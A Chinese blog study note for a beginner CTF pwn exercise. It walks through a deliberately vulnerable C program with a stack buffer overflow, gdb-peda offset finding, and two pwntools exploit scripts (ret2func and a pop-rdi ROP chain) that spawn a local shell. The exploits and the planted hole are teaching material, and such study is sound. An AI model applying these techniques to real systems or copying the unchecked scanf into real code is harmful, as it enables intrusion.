# 学习笔记**一道入门级别的栈溢出pwn题环境搭建**

最新推荐文章于 2024-07-19 15:16:23 发布
最新推荐文章于 2024-07-19 15:16:23 发布
阅读量110 收藏
点赞数
分类专栏: 笔记 reverse ctf 文章标签: 学习 ubuntu linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47210241/article/details/129900108
版权
ctf 同时被 3 个专栏收录
23 篇文章 1 订阅
订阅专栏
笔记
19 篇文章 0 订阅
订阅专栏
reverse
5 篇文章 0 订阅
订阅专栏

学习笔记一道入门级别的栈溢出pwn题环境搭建

#include<stdio.h>
#include<stdlib.h>
int main()
{
char buf[80];
printf("input your key:\n");
scanf("%s",buf);
printf("%s",buf);
return 0;
}

void shell()
{
system("/bin/sh");
}


iantbranch@ubuntu:~/Desktop/xuexipwn1$ gcc -fno-stack-protector pwn1.c -o pwn1giantbranch@ubuntu:~/Desktop/xuexipwn1$ ls
pwn1  pwn1.c
giantbranch@ubuntu:~/Desktop/xuexipwn1$ ./pwn1
input your key:
kkkkk
kkkkkgiantbranch@ubuntu:~/Desktop/xuexipwn1$ file pwn1
pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=99f467bb7c85c78e281fca2655f3857062ca3091, not stripped
giantbranch@ubuntu:~/Desktop/xuexipwn1$  checksec pwn1
[*] '/home/giantbranch/Desktop/xuexipwn1/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
giantbranch@ubuntu:~/Desktop/xuexipwn1$  strings pwn1|grep sh
/bin/sh
shell
.shstrtab
.gnu.hash
giantbranch@ubuntu:~/Desktop/xuexipwn1$ objdump -d pwn1|grep system
00000000004004e0 <system@plt>:
  400674:	e8 67 fe ff ff       	callq  4004e0 <system@plt>
giantbranch@ubuntu:~/Desktop/xuexipwn1$ gdb pwn1 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 175 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from pwn1...(no debugging symbols found)...done.
gdb-peda$ patt
patta           pattern         pattern_env     pattern_search
pattc           pattern_arg     pattern_offset  patto
patte           pattern_create  pattern_patch   patts
gdb-peda$ patt
patta           pattern         pattern_env     pattern_search
pattc           pattern_arg     pattern_offset  patto
patte           pattern_create  pattern_patch   patts
gdb-peda$ patt
patta           pattern         pattern_env     pattern_search
pattc           pattern_arg     pattern_offset  patto
patte           pattern_create  pattern_patch   patts
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/giantbranch/Desktop/xuexipwn1/pwn1 
input your key:
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7fffff37 
RDX: 0x7ffff7dd3780 --> 0x0 
RSI: 0x0 
RDI: 0x7ffff7dd2620 --> 0xfbad2a84 
RBP: 0x3541416641414a41 ('AJAAfAA5')
RSP: 0x7fffffffde38 ("AAKAAgAA6AALAAh"...)
RIP: 0x40066a (<main+68>:	ret)
R8 : 0x0 
R9 : 0xc8 
R10: 0xc8 
R11: 0x7fffffffdde0 ("AAA%AAsAABAA$AA"...)
R12: 0x400530 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf10 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40065f <main+57>:	call   0x4004f0 <printf@plt>
   0x400664 <main+62>:	mov    eax,0x0
   0x400669 <main+67>:	leave  
=> 0x40066a <main+68>:	ret    
   0x40066b <shell>:	push   rbp
   0x40066c <shell+1>:	mov    rbp,rsp
   0x40066f <shell+4>:	mov    edi,0x400717
   0x400674 <shell+9>:	call   0x4004e0 <system@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde38 ("AAKAAgAA6AALAAh"...)
0008| 0x7fffffffde40 ("6AALAAhAA7AAMAA"...)
0016| 0x7fffffffde48 ("A7AAMAAiAA8AANA"...)
0024| 0x7fffffffde50 ("AA8AANAAjAA9AAO"...)
0032| 0x7fffffffde58 ("jAA9AAOAAkAAPAA"...)
0040| 0x7fffffffde60 ("AkAAPAAlAAQAAmA"...)
0048| 0x7fffffffde68 ("AAQAAmAARAAoAAS"...)
0056| 0x7fffffffde70 ("RAAoAASAApAATAA"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040066a in main ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0x0
 RBX  0x0
 RCX  0x7fffff37
 RDX  0x7ffff7dd3780 (_IO_stdfile_1_lock) ◂— 0x0
 RDI  0x7ffff7dd2620 (_IO_2_1_stdout_) ◂— 0xfbad2a84
 RSI  0x0
 R8   0x0
 R9   0xc8
 R10  0xc8
 R11  0x7fffffffdde0 ◂— 0x4173414125414141 ('AAA%AAsA')
 R12  0x400530 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdf10 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x3541416641414a41 ('AJAAfAA5')
 RSP  0x7fffffffde38 ◂— 0x41416741414b4141 ('AAKAAgAA')
 RIP  0x40066a (main+68) ◂— ret    
───────────────────────────────────[ DISASM ]───────────────────────────────────
 ► 0x40066a <main+68>    ret    <0x41416741414b4141>










───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0x7fffffffde38 ◂— 0x41416741414b4141 ('AAKAAgAA')
01:0008│      0x7fffffffde40 ◂— 0x416841414c414136 ('6AALAAhA')
02:0010│      0x7fffffffde48 ◂— 0x6941414d41413741 ('A7AAMAAi')
03:0018│      0x7fffffffde50 ◂— 0x41414e4141384141 ('AA8AANAA')
04:0020│      0x7fffffffde58 ◂— 0x414f41413941416a ('jAA9AAOA')
05:0028│      0x7fffffffde60 ◂— 0x6c41415041416b41 ('AkAAPAAl')
06:0030│      0x7fffffffde68 ◂— 0x41416d4141514141 ('AAQAAmAA')
07:0038│      0x7fffffffde70 ◂— 0x415341416f414152 ('RAAoAASA')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0           40066a main+68
   f 1 41416741414b4141
   f 2 416841414c414136
   f 3 6941414d41413741
   f 4 41414e4141384141
   f 5 414f41413941416a
   f 6 6c41415041416b41
   f 7 41416d4141514141
   f 8 415341416f414152
   f 9 7141415441417041
   f 10 4141724141554141
Program received signal SIGSEGV (fault address 0x0)
gdb-peda$  x/gx $rsp
0x7fffffffde38:	0x41416741414b4141
gdb-peda$ pattern_offset 41416741414b4141
41416741414b4141 not found in pattern buffer
gdb-peda$ pattern offset $rsp
140737488346680 not found in pattern buffer
gdb-peda$ pattern offset $rbp
3837420264933640769 found at offset: 80
gdb-peda$ +8
Undefined command: "+8".  Try "help".
gdb-peda$ pattern offset AAKAAgAA
AAKAAgAA found at offset: 88
gdb-peda$ objdump -d pwn1|grep shell
Undefined command: "objdump".  Try "help".
gdb-peda$ 


from pwn import *
p=process("pwn1")
pad = 88
shell_addr=0x040066b
payload=b'A'*pad+p64(shell_addr)
p.send(payload)
p.interactive()

giantbranch@ubuntu:~/Desktop/xuexipwn1$ objdump -d pwn1|grep shell
000000000040066b <shell>:
giantbranch@ubuntu:~/Desktop/xuexipwn1$ vim poc1.py
giantbranch@ubuntu:~/Desktop/xuexipwn1$ cat poc1.py 
from pwn import *
p=process("pwn1")
pad = 88
shell_addr=0x040066b
payload=b'A'*pad+p64(shell_addr)
p.send(payload)
p.interactive()

giantbranch@ubuntu:~/Desktop/xuexipwn1$ python2 poc1.py 
[!] Could not find executable 'pwn1' in $PATH, using './pwn1' instead
[+] Starting local process './pwn1': pid 5897
[*] Switching to interactive mode
input your key:
$ id
$ id
uid=1000(giantbranch) gid=1000(giantbranch) groups=1000(giantbranch)
$ id
uid=1000(giantbranch) gid=1000(giantbranch) groups=1000(giantbranch)
$

image-20230401171817218

giantbranch@ubuntu:~/Desktop/xuexipwn1$ ROPgadget --binary pwn1 --only “pop|ret”|grep rdi
0x00000000004006e3 : pop rdi ; ret

giantbranch@ubuntu:~/Desktop/xuexipwn1$ python2 poc2.py
[!] Could not find executable 'pwn1' in $PATH, using './pwn1' instead
[+] Starting local process './pwn1': pid 5933
[*] '/home/giantbranch/Desktop/xuexipwn1/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] Switching to interactive mode
input your key:
$ id
$ id
uid=1000(giantbranch) gid=1000(giantbranch) groups=1000(giantbranch)
$ id
uid=1000(giantbranch) gid=1000(giantbranch) groups=1000(giantbranch)
$ 
[*] Interrupted
[*] Stopped process './pwn1' (pid 5933)
giantbranch@ubuntu:~/Desktop/xuexipwn1$ cat poc2.py 

from pwn import *

p = process("pwn1")
e = ELF("pwn1")
pad = 88
pop_rdi_addr = 0x00000000004006e3
system_addr = e.symbols['system']
binsh_addr = e.search('/bin/sh').next()
payload = b'a'*pad + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
p.send(payload)
p.interactive()
giantbranch@ubuntu:~/Desktop/xuexipwn1$

参考:http://cn-sec.com/archives/632579.html

32进制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
老表带你学Linux kernel pwn 入门(一)
weixin_43889007的博客
11-04 3008
不加任何保护机制的内核栈溢出提权
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
2301_82242964的博客
05-04 581
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
起点
WateranFire的博客
08-31 296
今天开始在合天上学习CTF的PWN与RE等等,将一些知识点写在博客里以加深印象,帮助记忆。 PWN:      首先关于Linux管道:Linux管道可以将一个进程的标准输出作为另一个进程的标准输入,管道的操作符号为“|” eg: ls命令可用于查看当前目录下的文件列表,而grep命令可用于匹配特定的字符,因此ls | grep test命令可用于列出当前目录下文件名包含test的文件。
什么是栈溢出漏洞_vivotek栈溢出漏洞复现_0基础渗透入门教程
程序员六七的博客
05-29 609
​ 老办法通过IDA搜索报错字符串,定位到如下位置,可以发现报错原因是因为此程序中使用函数将主机名保存在中,并使用函数通过主机名找到IP地址。
溢出漏洞怎么利用/从CVE复现看栈溢出漏洞利用_零开始白客教程
程序员三九的博客
05-21 956
最近复现了两个栈溢出漏洞的cve,分别是CVE-2017-9430和CVE-2017-13089,简单记录一下real wrold中的栈溢出漏洞学习。目前
学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前
arttnba3的博客
02-25 563
学习札记NO.00004】Linux Kernel Pwn学习笔记 I:一切开始之前[GITHUB BLOG ADDR](https://arttnba3.cn/2021/02/21/NOTE-0X02-LINUX-KERNEL-PWN-PART-I/)0x00.Linux Kernel Basic Knowledge一、内核内核架构:微内核 & 宏内核(单内核)宏内核(Monolithic Kernel,又叫单内核)微内核(Micro Kernel)二、分级保护域Intel Ring Model
红队项目PinkysPalace格式字符串缓冲区溢出详解
白帽黑客鹏哥的博客
05-27 1216
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
适合自学的网络安全基础技能“蓝宝书”:《CTF那些事儿》_高中生ctf入门
weixin_42340783的博客
04-28 1578
本书由顶级CTF战队Lancet的指导教师李舟军教授和核心团队成员历时4年打磨而成,创新性地提出了新的CTF知识学习框架,体现了李舟军教授多年的教学精髓和带队经验。书中涵盖PWN、逆向、Web等常见目,并系统性总结了CTF比赛中工控安全的考察方式。不仅讲授基础知识和操作技能,还探讨CTF赛的本质,着重阐述了面对不同类型目时的分析思路和方法。同时,书中针对CTF比赛学习的编排方式,符合我国主流的计算机学科知识体系结构,李舟军教授结合学生的实战经验,为网络安全空间爱好者提供了一本教科书式的实践指导手册。
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn栈溢出10道练习有writeup
01-04
在这个场景中,"pwn栈溢出10道练习有writeup" 提供了10个关于栈溢出的实战练习,每个目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
一键搭建pwn环境脚本
03-25
一键搭建pwn环境脚本,安装pwntools, libc-database,vim, ropper, ROPgadget,libc-debug,ssh, one_gadget, pwndbg + pwngdb, 。其中pwntools为python3库 使用方法: chmod +x init_pwn.sh ./init_pwn.sh
昇思25天学习打卡营第14天|LLM-文本解码原理--以MindNLP为例
wwt72的博客
07-17 731
限制输出序列的最大长度为50个token。top-p=0.95,top-p采样表示在每一步生成token时,只从概率分布中累计概率达到95%的token中进行采样,有助于保持生成文本的流畅性和质量,同时允许一些低概率的token被选中,从而增加多样性。表示禁用了top-k采样,因为在top-k采样中,通常是从概率最高的k个token中随机选择一个token作为下一个输出,而这里设置为0表示不限制token的选择,实际上这将等同于使用 softmax 概率分布直接进行采样。这有助于提高生成文本的多样性。
卷积神经网络学习总结
weixin_61681867的博客
07-17 499
均方误差函数(MSE)适用于回归任务,如预测房价、预测股票价格等。
kubernetes学习日志(七)
qq_47037022的博客
07-18 575
本文记录了service管理,ingress管理,Dashboard管理插件,集群鉴权策略,角色与全局角色,赋权与全局角色赋权。
手写简易版Spring IOC容器02【学习
最新发布
weixin_44794897的博客
07-19 459
其中applyPropertyValues用于从beanDefinition中读取属性的配置信息然后通过BeanUtil(hutool-all中提供的类)为其赋值@Overridetry {// 创建bean实例Class<?if (null!break;// 设置属性值try {// 从beanDefinition中获取property通过Resource获取文件流。
博客前端项目学习day03——框架页
qq_53237241的博客
07-19 323
【代码】博客前端项目学习day03——框架页。
NJUPT PWN入门:理解栈溢出原理与利用方法
栈溢出是计算机安全领域中一个重要的概念,尤其是在逆向工程(Pwn)中扮演着关键角色...同时,对于学习Pwn或逆向工程的人来说,掌握栈溢出的利用方法是入门阶段的重要挑战,也是进一步深入研究其他漏洞利用技术的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值